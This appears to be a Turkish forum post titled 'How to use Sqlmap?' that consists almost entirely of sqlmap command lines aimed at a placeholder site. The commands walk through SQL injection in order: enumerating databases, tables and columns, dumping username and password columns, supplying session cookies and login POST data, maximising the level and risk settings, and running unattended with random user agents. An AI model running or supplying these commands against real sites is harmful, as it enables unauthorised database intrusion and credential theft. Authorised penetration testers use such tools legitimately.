Sqlmap Nasıl Kullanılır ?
Moderatör tarafında düzenlendi:
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
sqlmap -u "http://site.com/page.php?id=1" [parametreler]
sqlmap -u "http://site.com/page.php?id=1"
sqlmap -u "http://site.com/page.php?id=1" --dbms=mysql
sqlmap -u "http://site.com/page.php?id=1" --dbs
sqlmap -u "http://site.com/page.php?id=1" -D hedefveritabani --tables
sqlmap -u "http://site.com/page.php?id=1" -D hedefveritabani -T hedeftablo --columns
sqlmap -u "http://site.com/page.php?id=1" -D hedefveritabani -T hedeftablo -C kullanici,sifre --dump
sqlmap -u "http://site.com/page.php?id=1" --cookie="PHPSESSID=12345"
sqlmap -u "http://site.com/page.php?id=1" --headers="User-Agent: Mozilla/5.0"
sqlmap -u "http://site.com/login.php" --data="username=admin&password=123"
sqlmap -u "http://site.com/page.php?id=1" --level=5 --risk=3
sqlmap -u "http://site.com/page.php?id=1" --batch --random-agent
sqlmap -u "http://site.com/index.php?id=1"